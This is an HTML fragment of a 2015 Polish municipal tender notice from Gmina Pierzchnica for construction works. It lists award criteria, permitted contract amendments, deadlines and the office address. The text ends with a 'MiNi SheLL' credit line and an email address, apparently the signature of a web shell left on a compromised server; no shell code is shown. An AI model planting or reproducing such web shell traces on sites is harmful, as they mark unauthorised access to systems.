</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej rękojmi - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach:

1.	W przypadku modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót dodatkowych zostanie pomniejszone wynagrodzenie umowne za roboty zaniechane w oparciu o kosztorys ofertowy.
2.	Dopuszcza się zmiany zawartej umowy w zakresie: 
1.	Dopuszcza  się stosowanie robót zamiennych w następujących okolicznościach:
1)	Na wniosek Wykonawcy, za zgodą Zamawiającego, w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii wykonania elementów robót. Dopuszcza się je tylko w przypadku, gdy proponowane przez Wykonawcę rozwiązanie jest równorzędne lub lepsze funkcjonalnie, od tego, jaki przewiduje dokumentacja. W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami, Projekt taki wymaga akceptacji i zatwierdzenia przez Zamawiającego.
2)	W przypadku gry z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych wynikających z umowy Zamawiający sporządza protokół robót zamiennych, a następnie dostarcza dokumentację na te roboty.
3)	Konieczności wykonania robót zamiennych w stosunku do przewidzianych w dokumentacji w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego i zgodnego z zasadami wiedzy technicznej i obowiązującymi przepisami wykonania przedmiotu umowy.
4)	Konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, a zmiany te uniemożliwiają przekazanie obiektu do użytkowania.
5)	Konieczność wprowadzenia zmian spowodowanych kolizją z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
6)	W przypadku, gdy określone w pkt. 2 zmiany spowodują wzrost kosztów, roboty te będą traktowane jako dodatkowe lub uzupełniające i Zamawiający złoży na ich wykonanie dodatkowe zamówienie, w trybie wynikającym z ustawy Pzp.
7)	Rozliczenie robót zamiennych, o których mowa w pkt. 1)- 5) następuje w oparciu o czynniki cenotwórcze przedstawione w kosztorysie ofertowym Wykonawcy. W przypadku braku w kosztorysie ofertowym cen materiałów lub urządzeń przyjmuje się za prawidłowe średnie ceny z ostatniego opublikowanego cennika sekocenbud dla woj. świętokrzyskiego lub udokumentowaną najniższą cenę z trzech porównywalnych cen z hurtowni z materiałami.  

2.	Zamawiającemu przysługuje prawo zmniejszenia wynagrodzenia w przypadku:
1)	Rezygnacji z części zakresu robót do wykonania
2)	Braku konieczności wykonania robót wynikłych z błędów stwierdzonych w dokumentacji projektowej.
3)	Modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót dodatkowych lub uzupełniających za roboty zaniechane.
4)	Wystąpienie okoliczności o których mowa w § 10 ust. 3 wzoru umowy- załącznik nr 8 do SIWZ.
5)	Jeżeli wartość robót zamiennych będzie mniejsza od podstawowych.
6)	Zmniejszenie wynagrodzenia, o którym mowa w pkt. 1)- 4) następuje w oparciu o kosztorys ofertowy.

3.	Zmiana terminu, który uprawnia do zmiany harmonogramu, który wymaga akceptacji Zamawiającego nastąpi  w następujących okolicznościach:
1.	Zmiana terminu przewidzianego na zakończenie robót, tj.:
a)	zmiany spowodowane warunkami atmosferycznymi w szczególności:
- działania siły wyższej (np. klęski żywiołowej, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania robót;
- warunki atmosferyczne odbiegające od typowych dla pory roku, uniemożliwiające prowadzenie robót budowlanych.
b)  konieczność usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót o czas niezbędny do ich usunięcia,
c) przestojów i opóźnień zawinionych przez Zamawiającego.
d) wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
e) wykopalisk archeologicznych uniemożliwiających wykonanie dalszych robót.
	2. Zmiany materiałowe, dopuszcza się wprowadzenie zmiany materiałów i urządzeń przedstawionych  w ofercie pod warunkiem, że:
a) spowodują obniżenie kosztów ponoszonych przez Zamawiającego na eksploatację wykonanego przedmiotu umowy;
b) wynikają z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów (następca zmienianego materiału lub urządzenia);
c) zmiana materiałów lub urządzeń o parametrach tożsamych lub lepszych od przyjętych w ofercie w  przypadku wycofania lub niedostępność na rynku materiału lub urządzenia oferowanego.
3. Dokonanie zmiany kierownika budowy (robót) na osobę o kwalifikacjach i doświadczeniu wymaganym  w SIWZ.
	
Wszystkie powyższe postanowienia stanowią katalog zmian, które przed wprowadzeniem do umowy wymagają zgodnej akceptacji stron umowy z wyłączeniem postanowień określonych w ust. 2, gdzie podjęcie decyzji o zmniejszeniu wynagrodzenia nie wymaga akceptacji Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pierzchnica.bip.jur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pierzchnica
ul. 13- go Stycznia 6; 26-015 Pierzchnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2015 godzina 10:00, miejsce: Urząd Gminy Pierzchnica
ul. 13- go Stycznia 6; 26-015 Pierzchnica
sekretariat (pokój nr 11).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com